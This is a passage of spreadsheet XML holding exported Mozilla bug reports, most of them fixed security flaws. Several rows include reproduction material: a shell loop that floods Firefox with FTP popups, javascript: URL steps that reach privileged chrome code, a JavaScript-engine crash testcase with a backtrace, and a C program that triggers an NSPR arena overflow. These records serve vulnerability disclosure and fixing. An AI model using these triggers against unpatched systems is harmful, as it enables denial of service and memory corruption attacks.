          <t>2019-01-28 01:23:50 -0800</t>
        </is>
      </c>
      <c r="C3474" t="inlineStr">
        <is>
          <t>FTP can open endless number of blocking popups, making Firefox unusable</t>
        </is>
      </c>
      <c r="D3474" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E3474" t="n">
        <v>1</v>
      </c>
      <c r="F3474" t="n">
        <v>1</v>
      </c>
      <c r="G3474" t="n">
        <v>6</v>
      </c>
      <c r="H3474" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3474" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3474" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K3474" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3474" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3474" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3474" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3474" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3474" t="inlineStr">
        <is>
          <t>[disclosure deadline April 28, 2019][adv-main66+]</t>
        </is>
      </c>
      <c r="Q3474" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3474" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3474" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T3474" t="n">
        <v>1</v>
      </c>
      <c r="U3474" t="n">
        <v>0</v>
      </c>
      <c r="V3474" t="n">
        <v>25</v>
      </c>
      <c r="W3474" t="inlineStr">
        <is>
          <t>Created attachment 9039484
firefox-manypopups.webm
FTP login and error popups are blocking (i.e. make the main window unusable).
By causing a lot of FTP popups a site can practically make the browser unusable. I'll attach a video showing how this looks.
This is a simple setup with an FTP server allowing anoynmous login (I use proftpd, every one should do) and an HTML file containing lots of img tags loading images from an invalid directory.
I create the HTML with this:
for i in $(seq 1 10000); do echo "&lt;img src='../$i/$i.png'&gt;"; done
In this example I get a mixture of directory errors and login fields. I don't know exactly why the login fields show up, I guess the FTP server reacts somehow to being overloaded with requests.
There's no other option than killing the browser to escape such a situation. It's "only a DoS", but a pretty annoying one.
(Ceterum Censeo FTP esse delendam.)</t>
        </is>
      </c>
      <c r="X3474" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3475">
      <c r="A3475" t="n">
        <v>522430</v>
      </c>
      <c r="B3475" t="inlineStr">
        <is>
          <t>2009-10-14 23:43:52 -0700</t>
        </is>
      </c>
      <c r="C3475" t="inlineStr">
        <is>
          <t>window.opener allows chrome access from unprivileged pages</t>
        </is>
      </c>
      <c r="D3475" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3475" t="n">
        <v>1</v>
      </c>
      <c r="F3475" t="n">
        <v>1</v>
      </c>
      <c r="G3475" t="n">
        <v>3</v>
      </c>
      <c r="H3475" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3475" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3475" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3475" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3475" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3475" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3475" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3475" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3475" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3475" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3475" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3475" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T3475" t="n">
        <v>1</v>
      </c>
      <c r="U3475" t="n">
        <v>0</v>
      </c>
      <c r="V3475" t="n">
        <v>20</v>
      </c>
      <c r="W3475" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4
When new windows are opened in Firefox, the new window has a reference to the window that created it using window.opener. If window.opener is a ChromeWindow, then any webpage opened in this window will be able to access the functions inside the ChromeWindow.
Both Firefox itself and many extensions for Firefox often open windows from within chrome code. With this security hole, windows opened by chrome code are unsafe.
Reproducible: Always
Steps to Reproduce:
1. Select Help -&gt; About Mozilla Firefox
2. Click on "Licensing Information"
3. A new window will open with licensing information. In this window, go to http://www.google.com
4. In the URL bar, type javascript:window.opener.URLBarSetURI({spec:"https://www.ebay.com/"},true)
5. In the URL bar, type javascript:window.opener.BrowserOffline.toggleOfflineStatus()
6. Browse to a web page that contains the above code in a script tag. Note that Firefox's security model does not prevent this code from running.
Actual Results:  
1. The URL bar of the opening window is set to "https://www.ebay.com/"
2. The browser is set to work offline
3. Web pages can access and run chrome code
Expected Results:  
The new window should not be able to access properties of the chrome window.
This bug likely effects not just Firefox itself, but also many extensions which open windows using window.open.</t>
        </is>
      </c>
      <c r="X3475" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3476">
      <c r="A3476" t="n">
        <v>70626</v>
      </c>
      <c r="B3476" t="inlineStr">
        <is>
          <t>2001-03-01 12:59:41 -0800</t>
        </is>
      </c>
      <c r="C3476" t="inlineStr">
        <is>
          <t>Save as template or draft with an attachment attempts to send message</t>
        </is>
      </c>
      <c r="D3476" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:10 -0700</t>
        </is>
      </c>
      <c r="E3476" t="n">
        <v>1</v>
      </c>
      <c r="F3476" t="n">
        <v>1</v>
      </c>
      <c r="G3476" t="n">
        <v>3</v>
      </c>
      <c r="H3476" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3476" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3476" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="K3476" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3476" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3476" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3476" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3476" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3476" t="inlineStr">
        <is>
          <t>[nsbeta1+]</t>
        </is>
      </c>
      <c r="Q3476" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3476" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3476" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T3476" t="n">
        <v>1</v>
      </c>
      <c r="U3476" t="n">
        <v>0</v>
      </c>
      <c r="V3476" t="n">
        <v>13</v>
      </c>
      <c r="W3476" t="inlineStr">
        <is>
          <t>buildid:2001030106
Compose a new message with an attachment and trying to save it as template or
drafts from menu item or draft results in an error trying to send instead of
saving it.  This is only when you have an attachment while saving.  Just a plain
text or html text can be saved as template or draft.
copies and folder setting:  save draft-draft in local folder
                            save template-template in local folder
Steps
open mail
compose a new mail message and attach a any file(jpeg,txtfile,gif)
Go to menu item file/save as/template or draft
Expected: saves this message as a template to be edited or sent later in the
local template folder
Actual:  Gives an error message "sending of message failed".  Should save the
message instead of attempting to send it.</t>
        </is>
      </c>
      <c r="X3476" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3477">
      <c r="A3477" t="n">
        <v>584512</v>
      </c>
      <c r="B3477" t="inlineStr">
        <is>
          <t>2010-08-04 14:43:51 -0700</t>
        </is>
      </c>
      <c r="C3477" t="inlineStr">
        <is>
          <t>nsPluginArray - memory corruption</t>
        </is>
      </c>
      <c r="D3477" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3477" t="n">
        <v>1</v>
      </c>
      <c r="F3477" t="n">
        <v>1</v>
      </c>
      <c r="G3477" t="n">
        <v>3</v>
      </c>
      <c r="H3477" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3477" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3477" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3477" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3477" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3477" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3477" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3477" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3477" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3477" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3477" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3477" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3477" t="n">
        <v>1</v>
      </c>
      <c r="U3477" t="n">
        <v>0</v>
      </c>
      <c r="V3477" t="n">
        <v>14</v>
      </c>
      <c r="W3477" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.14 Safari/534.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Looks like it's a use-after-free issue.
I think the testcase is self-explaining although it's quite weak - it takes a lot of time to trigger the crash.
Reproducible: Always
http://crash-stats.mozilla.com/report/index/4b3b731c-511c-484c-a13f-ff27b2100804
Also crashes 4.0b2.</t>
        </is>
      </c>
      <c r="X3477" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3478">
      <c r="A3478" t="n">
        <v>1123661</v>
      </c>
      <c r="B3478" t="inlineStr">
        <is>
          <t>2015-01-20 05:41:21 -0800</t>
        </is>
      </c>
      <c r="C3478" t="inlineStr">
        <is>
          <t>Assertion failure: entry.isJs(), at vm/SPSProfiler.cpp:365 or Crash [@ MarkInternal&lt;JSAtom&gt;]</t>
        </is>
      </c>
      <c r="D3478" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:41 -0700</t>
        </is>
      </c>
      <c r="E3478" t="n">
        <v>1</v>
      </c>
      <c r="F3478" t="n">
        <v>1</v>
      </c>
      <c r="G3478" t="n">
        <v>3</v>
      </c>
      <c r="H3478" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3478" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3478" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3478" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3478" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3478" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3478" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3478" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3478" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q3478" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3478" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3478" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3478" t="n">
        <v>1</v>
      </c>
      <c r="U3478" t="n">
        <v>0</v>
      </c>
      <c r="V3478" t="n">
        <v>21</v>
      </c>
      <c r="W3478" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision c1c6840d9255 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-debug, run with --fuzzing-safe --thread-count=2):
function printStatus (msg) {
  var lines = msg.split ("\n");
  for (var i=0; i &lt; lines.length; i++)
    unescape (lines[i]);
}
function toPrinted(value) {
  value = String(value);
  value = value.replace(/\\n/g, 'NL').replace(/\n/g, 'NL')
}
function reportCompare (expected, actual) {
  toPrinted(expected) + toPrinted(actual) + "";
}
evaluate("gczeal(14)", { noScriptRval : true, compileAndGo : true });
enableSPSProfiling();
test();
function test() {
  printStatus ('');
  reportCompare(false, '');
  reportCompare(false, '');
  test() = 17;
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
MarkInternal&lt;JSAtom&gt; (trc=0x16c6058, thingp=0x16e2308) at js/src/gc/Marking.cpp:276
276	        if (IsInsideNursery(thing))
#0  MarkInternal&lt;JSAtom&gt; (trc=0x16c6058, thingp=0x16e2308) at js/src/gc/Marking.cpp:276
#1  0x00000000007bdacd in JSScript::markChildren (this=0x7ffff562e510, trc=0x16c6058) at js/src/jsscript.cpp:3402
#2  0x00000000004d1fc3 in MarkChildren (trc=0x16c6058, script=0x7ffff562e510) at js/src/gc/Marking.cpp:1356
#3  PushMarkStack (thing=0x7ffff562e510, gcmarker=0x16c6058) at js/src/gc/Marking.cpp:1101
#4  MarkInternal&lt;JSScript&gt; (trc=0x16c6058, thingp=&lt;optimized out&gt;) at js/src/gc/Marking.cpp:294
#5  0x000000000073b830 in trace (trc=0x16c6058, this=(JSFunction * const) 0x7ffff562d880 [object Function "ArrayStaticReduce"]) at js/src/jsfun.cpp:773
#6  fun_trace (trc=0x16c6058, obj=(JSObject *) 0x7ffff562d880 [object Function "ArrayStaticReduce"]) at js/src/jsfun.cpp:786
#7  0x000000000050dfd7 in js::GCMarker::processMarkStackTop (this=0x16c6058, budget=...) at js/src/gc/Marking.cpp:1831
#8  0x00000000004e6d8d in js::GCMarker::drainMarkStack (this=0x16c6058, budget=...) at js/src/gc/Marking.cpp:1894
#9  0x0000000000774636 in drainMarkStack (phase=js::gcstats::PHASE_MARK, sliceBudget=..., this=0x16be458) at js/src/jsgc.cpp:5225
#10 js::gc::GCRuntime::incrementalCollectSlice (this=0x16be458, budget=..., reason=&lt;optimized out&gt;) at js/src/jsgc.cpp:5893
#11 0x000000000077571e in js::gc::GCRuntime::gcCycle (this=0x16be458, incremental=false, budget=..., reason=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:6113
#12 0x0000000000775d14 in js::gc::GCRuntime::collect (this=0x16be458, incremental=false, budget=..., reason=JS::gcreason::DEBUG_GC) at js/src/jsgc.cpp:6238
#13 0x0000000000777698 in gc (reason=JS::gcreason::DEBUG_GC, gckind=GC_SHRINK, this=0x16be458) at js/src/jsgc.cpp:6299
#14 js::gc::GCRuntime::runDebugGC (this=0x16be458) at js/src/jsgc.cpp:6687
#15 0x00000000008bbf58 in js::gc::CheckAllocatorState&lt;(js::AllowGC)1&gt; (cx=&lt;optimized out&gt;, kind=&lt;optimized out&gt;) at js/src/jsgcinlines.h:447
#16 0x0000000000911949 in CheckAllocatorState&lt;(js::AllowGC)1&gt; (cx=0x16e2cb0, kind=&lt;optimized out&gt;) at js/src/jsgcinlines.h:419
#17 AllocateNonObject&lt;JSString, (js::AllowGC)1&gt; (cx=0x16e2cb0) at js/src/jsgcinlines.h:538
#18 NewGCString&lt;(js::AllowGC)1&gt; (cx=0x16e2cb0) at js/src/jsgcinlines.h:627
#19 new_&lt;(js::AllowGC)1&gt; (cx=0x16e2cb0) at js/src/vm/String-inl.h:266
#20 AllocateInlineString&lt;(js::AllowGC)1, unsigned char&gt; (chars=&lt;synthetic pointer&gt;, len=&lt;optimized out&gt;, cx=0x16e2cb0) at js/src/vm/String-inl.h:31
#21 NewInlineString&lt;(js::AllowGC)1, unsigned char&gt; (chars=..., cx=0x16e2cb0) at js/src/vm/String-inl.h:57
#22 js::NewStringCopyNDontDeflate&lt;(js::AllowGC)1, unsigned char&gt; (cx=0x16e2cb0, s=0x7fffffffc700 "NaN", n=3) at js/src/vm/String.cpp:1011
#23 0x00000000007ab743 in NewStringCopyN&lt;(js::AllowGC)1&gt; (n=&lt;optimized out&gt;, s=0x7fffffffc700 "NaN", cx=0x16e2cb0) at js/src/vm/String.h:1140
#24 NewStringCopyZ&lt;(js::AllowGC)1&gt; (s=0x7fffffffc700 "NaN", cx=0x16e2cb0) at js/src/vm/String.h:1160
#25 js_NumberToStringWithBase&lt;(js::AllowGC)1&gt; (cx=0x16e2cb0, d=&lt;optimized out&gt;, base=10) at js/src/jsnum.cpp:1313
#26 0x00000000008213c3 in js::ToStringSlow&lt;(js::AllowGC)1&gt; (cx=0x16e2cb0, arg=...) at js/src/jsstr.cpp:4186
#27 0x0000000000881fac in ToString&lt;(js::AllowGC)1&gt; (v=..., cx=0x16e2cb0) at js/src/jsstr.h:152
#28 AddOperation (res=JSVAL_VOID, rhs=$jsval(""), lhs=$jsval(nan(0x8000000000000)), cx=0x16e2cb0) at js/src/vm/Interpreter.cpp:1245
#29 js::AddValues (cx=0x16e2cb0, lhs=$jsval(nan(0x8000000000000)), rhs=$jsval(""), res=JSVAL_VOID) at js/src/vm/Interpreter.cpp:3874
#30 0x00000000005cb956 in js::jit::DoBinaryArithFallback (cx=0x16e2cb0, frame=0x7fffffffcb28, stub_=0x16f07f0, lhs=$jsval(nan(0x8000000000000)), rhs=$jsval(""), ret=...) at js/src/jit/BaselineIC.cpp:2416
#31 0x00007ffff55b636a in ?? ()
#32 0x0000000000000202 in ?? ()
#33 0x00007fffffffcad0 in ?? ()
#34 0xfff9000000000000 in ?? ()
#35 0x00000000016b26a0 in js::jit::DoToNumberFallbackInfo ()
[...]
#52 0x0000000000000000 in ?? ()
rax	0x7ff7f56fffe8	140702951407592
rbx	0x16c6058	23879768
rcx	0x5ca2	23714
rdx	0xaeae68	11447912
rsi	0x16e2308	23995144
rdi	0x7ff7f561de80	140702950481536
rbp	0x16c6058	23879768
rsp	0x7fffffffc270	140737488339568
r8	0x400000200	17179869696
r9	0x16e22f8	23995128
r10	0x101	257
r11	0x1	1
r12	0x2	2
r13	0x7ffff5621240	140737310233152
r14	0x1	1
r15	0x7fffffffffff	140737488355327
rip	0x4d6e3c &lt;MarkInternal&lt;JSAtom&gt;(JSTracer*, JSAtom**)+76&gt;
=&gt; 0x4d6e3c &lt;MarkInternal&lt;JSAtom&gt;(JSTracer*, JSAtom**)+76&gt;:	testb  $0x1,(%rax)
   0x4d6e3f &lt;MarkInternal&lt;JSAtom&gt;(JSTracer*, JSAtom**)+79&gt;:	jne    0x4d6e21 &lt;MarkInternal&lt;JSAtom&gt;(JSTracer*, JSAtom**)+49
Marking s-s because this is a GC crash.</t>
        </is>
      </c>
      <c r="X3478" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3479">
      <c r="A3479" t="n">
        <v>1677047</v>
      </c>
      <c r="B3479" t="inlineStr">
        <is>
          <t>2020-11-13 00:49:20 -0800</t>
        </is>
      </c>
      <c r="C3479" t="inlineStr">
        <is>
          <t>Add the ports for the H323, PPTP, RTSP protocols (1720, 1723, 554) to the restricted ports list.</t>
        </is>
      </c>
      <c r="D3479" t="inlineStr">
        <is>
          <t>2021-04-04 19:04:28 -0700</t>
        </is>
      </c>
      <c r="E3479" t="n">
        <v>1</v>
      </c>
      <c r="F3479" t="n">
        <v>1</v>
      </c>
      <c r="G3479" t="n">
        <v>3</v>
      </c>
      <c r="H3479" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3479" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3479" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3479" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3479" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3479" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3479" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3479" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3479" t="inlineStr">
        <is>
          <t>[adv-main84+][adv-esr78.6+]</t>
        </is>
      </c>
      <c r="Q3479" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3479" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3479" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T3479" t="n">
        <v>1</v>
      </c>
      <c r="U3479" t="n">
        <v>0</v>
      </c>
      <c r="V3479" t="n">
        <v>21</v>
      </c>
      <c r="W3479" t="inlineStr">
        <is>
          <t>See bug 1676868 (and bug 1674735).</t>
        </is>
      </c>
      <c r="X3479" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3480">
      <c r="A3480" t="n">
        <v>1205157</v>
      </c>
      <c r="B3480" t="inlineStr">
        <is>
          <t>2015-09-15 19:56:53 -0700</t>
        </is>
      </c>
      <c r="C3480" t="inlineStr">
        <is>
          <t>NSPR overflow in PL_ARENA_ALLOCATE can lead to crash (under ASAN), potential memory corruption</t>
        </is>
      </c>
      <c r="D3480" t="inlineStr">
        <is>
          <t>2016-05-04 15:51:02 -0700</t>
        </is>
      </c>
      <c r="E3480" t="n">
        <v>1</v>
      </c>
      <c r="F3480" t="n">
        <v>1</v>
      </c>
      <c r="G3480" t="n">
        <v>3</v>
      </c>
      <c r="H3480" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3480" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J3480" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K3480" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3480" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3480" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3480" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3480" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3480" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+] Coordinate landing with Chrome team.</t>
        </is>
      </c>
      <c r="Q3480" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3480" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3480" t="inlineStr">
        <is>
          <t>4.10.10</t>
        </is>
      </c>
      <c r="T3480" t="n">
        <v>1</v>
      </c>
      <c r="U3480" t="n">
        <v>0</v>
      </c>
      <c r="V3480" t="n">
        <v>37</v>
      </c>
      <c r="W3480" t="inlineStr">
        <is>
          <t>Consider the following (simple) application, which uses NSS (rather than NSPR directly)
#include &lt;secport.h&gt;
int main(int argc, char** argv)
{
  PLArenaPool* temparena = NULL;
  temparena = PORT_NewArena(2048);
  if (temparena == NULL) return -1;  // Fatal allocation error
  void* foo = PORT_ArenaAlloc(temparena, 808464432);
  if (foo == NULL) return 0;  // Benign allocation failure (too large)
  PORT_FreeArena(temparena, PR_FALSE);
  return 0;
}
Run the above application with
ASAN_OPTIONS=verbosity=3:allocator_may_return_null=1 ./a.out
And see it crash with a message somewhat similar to the followin:
Trying to unpoison memory region [0xf4900fa0, 0x24c03fd0)
The crash is on the PORT_ArenaAlloc call, which, if you dig into further, is in the call to PL_ARENA_ALLOCATE ( http://mxr.mozilla.org/nss/source/lib/util/secport.c#272 )
The crash itself is in the expansion of the macro PL_MAKE_MEM_UNDEFINED, called / expanded at http://mxr.mozilla.org/nspr/source/lib/ds/plarena.h#149
The problem is that PL_ARENA_ALLOCATE doesn't check for overflow before determining whether or not enough memory exists, and as a result, overflows. The crash is ASAN yelling at the overflow.
Specifically, http://mxr.mozilla.org/nspr/source/lib/ds/plarena.h#142 and http://mxr.mozilla.org/nspr/source/lib/ds/plarena.h#143
Example values of _p and _nb in my case
_p = 4109373344
_nb = 808464432
_q = _p + _nb = 622870480
_q &lt; _p, therefore NSPR assumes the memory can be used directly from _p (that it already allocated enough), and Bad Things Happen. What's supposed to happen is that it would call PL_ArenaAllocate and let that yell at the user for the (large) allocation. Instead, it sets _a-&gt;avail = _q, which includes a wide swath of memory not allocated, and then returns _p to the caller, as if the large allocation succeeded.
In ASAN mode, this crashes when PL_MAKE_MEM_UNDEFINED is called, because _q &lt; _p.
In non-ASAN mode, no crashes, just wild writes.</t>
        </is>
      </c>
      <c r="X3480" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3481">
      <c r="A3481" t="n">
        <v>401042</v>
      </c>
      <c r="B3481" t="inlineStr">
        <is>
          <t>2007-10-24 17:49:01 -0700</t>
        </is>
      </c>
      <c r="C3481" t="inlineStr">
        <is>
          <t>Crash [@ nsInlineFrame::ReflowFrames] with ::first-letter float, binding, pre and //</t>
        </is>
      </c>
      <c r="D3481" t="inlineStr">
        <is>
          <t>2018-08-22 16:38:21 -0700</t>
        </is>
      </c>
      <c r="E3481" t="n">
        <v>1</v>
      </c>
      <c r="F3481" t="n">
        <v>1</v>
      </c>
      <c r="G3481" t="n">
        <v>3</v>
      </c>
      <c r="H3481" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3481" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3481" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3481" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3481" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3481" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3481" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3481" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3481" t="inlineStr">
        <is>
          <t>[sg:critical?] using freed frame</t>
        </is>
      </c>
      <c r="Q3481" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3481" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3481" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3481" t="n">
        <v>1</v>
      </c>
      <c r="U3481" t="n">
        <v>0</v>
      </c>
      <c r="V3481" t="n">
        <v>33</v>
      </c>
      <c r="W3481" t="inlineStr">
        <is>
          <t>Created attachment 286096
testcase
See testcase which crashes current trunk and branch builds on load.
Since this also crashes on branch, I'm marking it security sensitive for now.
http://crash-stats.mozilla.com/report/index/4bf28766-828f-11dc-af09-001a4bd43ed6
0  	nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;)  	 mozilla/layout/generic/nsInlineFrame.cpp:460
1 	nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) 	mozilla/layout/generic/nsInlineFrame.cpp:394
2 	nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, int&amp;) 	mozilla/layout/generic/nsLineLayout.cpp:883
3 	nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) 	mozilla/layout/generic/nsBlockFrame.cpp:3573
4 	nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, int*, LineReflowStatus*, int) 	mozilla/layout/generic/nsBlockFrame.cpp:3393
5 	nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, int*) 	mozilla/layout/generic/nsBlockFrame.cpp:3237
6 	nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, int*) 	mozilla/layout/generic/nsBlockFrame.cpp:2269
7 	nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) 	mozilla/layout/generic/nsBlockFrame.cpp:1854
8 	nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) 	mozilla/layout/generic/nsBlockFrame.cpp:940
9 	nsBlockReflowContext::ReflowBlock(nsRect const&amp;, int, nsCollapsingMargin&amp;, int, int, nsMargin&amp;, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) 	mozilla/layout/generic/nsBlockReflowContext.cpp:339
10 	nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, int*) 	mozilla/layout/generic/nsBlockFrame.cpp:2973
etc..</t>
        </is>
      </c>
      <c r="X3481" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3482">
